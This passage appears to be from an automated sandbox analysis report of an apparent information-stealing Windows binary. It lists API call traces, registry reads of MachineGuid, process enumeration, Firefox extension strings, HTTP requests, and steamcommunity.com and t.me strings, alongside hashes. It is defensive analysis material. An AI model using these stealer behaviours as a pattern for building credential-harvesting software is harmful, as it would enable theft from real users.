                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60,?,0042150A,00000000,0042150A,0042150A), ref: 00416DC7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlenstrstr$Sleep
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$steamcommunity.com$t.me
                                                                                                                                                                                                                                                                                                  • API String ID: 1105026832-5696879
                                                                                                                                                                                                                                                                                                  • Opcode ID: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                                  • Instruction ID: d2cef3e00896b903973622f9bff644efbf55bb675c2f2304de14bb25205f25c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfbe53031ad5f4abf68ac17c1e9529c3c811d18bb84b897b5de7f13dc1821656
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CA1C131900619ABCF05EFA1C9958EEB775BF58308F00814AF8056B152EF7CAAD5CBD5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404280: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,0042150A), ref: 00416A2B
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00416A46
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,00000000), ref: 00416A6E
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00416A8F
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000001,?), ref: 00416AA6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 4174444224-2861137601
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 855039ff49ac9ec10de8df2a88766b452ea63e393e544b77beb2aca96e60e2a3
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3da0e4c79ea6eeeea05f36d05e7dcc9dc094194869fc174e7ba2f01bb6edc5a2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7E418131600219ABCB15EBA2D9529EE7369AF44344F41441EF90267241DF7CBD86CBE9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?), ref: 004111AE
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF), ref: 004111CF
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004111D8
                                                                                                                                                                                                                                                                                                  • CharToOemA.USER32(?,?), ref: 004111EB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CharCloseOpenQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                                  • API String ID: 47404925-1211650757
                                                                                                                                                                                                                                                                                                  • Opcode ID: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                                  • Instruction ID: 74cc808a3cf8f870bdb796636e5c792b2cd0ecd8dddfbe9d76d68e0a257a884b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16c12f2459baa2cbda43e8e84c2d79d172a174663800f26a122aadbda53f4b45
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8214521D1C7C296E360CB10CD557FBB7A4ABF6348F11A71EB5CC51072EAB061D48342
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040257A
                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040258E
                                                                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 004025AD
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 004025E7
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,string too long,004024F6,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 00402608
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 0040260D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ??2@$??3@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemcpy
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,004185DE), ref: 00401005
                                                                                                                                                                                                                                                                                                  • VirtualAllocExNuma.KERNEL32 ref: 00401025
                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32 ref: 0040103D
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00401063
                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 0040107D
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401089
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Virtual$AllocProcess$CurrentExitFreeNumamemset
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1822673426-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 70da7db2db91f88941c3e71440bfa6ebbd6eb466aaac7195974b89fd4c7015d6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15f42dff5f2301d38eca779a0d211f41eaceec2696e379f308e95cd99238eb0b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA01D431A0665457E3102B386C09BEFB794AF16705F505538F888A2271EB20898586E9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0041073F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411E60: malloc.MSVCRT ref: 00411E71
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411E60: strncpy.MSVCRT ref: 00411E82
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000000,00000000,0000000E,?,?,?), ref: 0041076A
                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,0041FE21,?,00000000,00000000,0000000E,?,?,?), ref: 00410780
                                                                                                                                                                                                                                                                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410716
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$CurrentProfilelstrcpymallocmemsetstrncpy
                                                                                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                                                                                  • API String ID: 277847849-1654365787
                                                                                                                                                                                                                                                                                                  • Opcode ID: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9523786d007b465f85d219b7e39a8a5dfbdd483b20afe91046872d233f87955e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d785fc04096e95acf34b7e6468c066d787f928fe986cc39c3c6a36b777bc4be0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9201A5313003187BD620B6629C56FEF775E9FC5758F04082EB9455B282DEBCA8C587AA
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,Windows: ,?,?,00421508,?,?,Work Dir: In memory,?,?,00421509,?,?,?,?,00000000), ref: 00410CC1
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 00410CCF
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 00410CE7
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00410D0F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocGlobalMemoryProcessStatusmemsetwsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %d MB
                                                                                                                                                                                                                                                                                                  • API String ID: 1522292957-2651807785
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3e3ed3bcd73a1407d336ad636cad1e72ca107bb31f9cc5cd81d28413454cfe9f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d81009c1fb0d01048417fa34eff7a46ff86d7423faa8b714d64e7233f6e460f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEF02B71700200B7D7106715DC46F6F7BAADBC17B1F040119F656A32D0CA746C11C7DA
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1274457161-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 62d16cf430872f387fa1639693609a914c0cef2d6ed42a20a6b15e59f3bc2f55
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 338301ac71ae11cf9b1fde0c63b9cae2eea139686097d1af895d36c4ff47176c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9516AA01083C089EB46DF29D4E97477E955B26318F1982D9DC880F2CBC3BAC558C7FA
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411009
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00411017
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411027
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 0041107A
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411085
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 562399079-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                                  • Instruction ID: ad10719cd445ab04cf283b63720ee16ebf2a6e79acd2848d50ffecdf406f3b24
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 58348e437a27bc0644566453b947fbefec51a5999494bbe316478c62b720522d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 571182743002146FD7106B62AC89FFFBB9DEFC9754F04542EB50A86291DE7C9884C6A6
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?,00000000,?,?,?,?,?,00421363,0042150A,?,?,?,?,?,?,?), ref: 0040C5DA
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000010,00000000,?,0040CC78,00000000,?,?), ref: 0040C5F8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                                                                                                                  • API String ID: 998311485-3310892237
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4550867a98b25e7581df9e4b8235ee868c3135c7b22e1cb8c030328980bfc982
                                                                                                                                                                                                                                                                                                  • Instruction ID: e851882c1721239b6607cf2b57b0a0084f57c32a141c23d73fe3fe214d6676a2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4550867a98b25e7581df9e4b8235ee868c3135c7b22e1cb8c030328980bfc982
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14616131A107199BCB14FBB1C9D69EE7368AF08308F40455EB91657142EF7CAEC8CBA5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00416EC0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403090: lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00403114
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403090: StrCmpCA.SHLWAPI(?,https,0042150A,0042150A,0042150A,0042150A,00000000,00000000,00000000,00000000), ref: 0040316F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00403090: InternetOpenA.WININET ref: 0040319E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?), ref: 00416F77
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpylstrlen$InternetOpen
                                                                                                                                                                                                                                                                                                  • String ID: ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 3860179324-2861137601
                                                                                                                                                                                                                                                                                                  • Opcode ID: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 43c13bd387ffc7ea7dd124343602ed7a74854246be98469252eee39eb9cb9d78
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a41e2adf9883fe8727359321e92805b2a13fc33e9da6a27b96af3066c66adf7c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E3159719003099FCF00EFA5C9819EEBBB5BF48314F40445EF916A7251DB38A985CFA8
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8,?,?,?), ref: 00413F0F
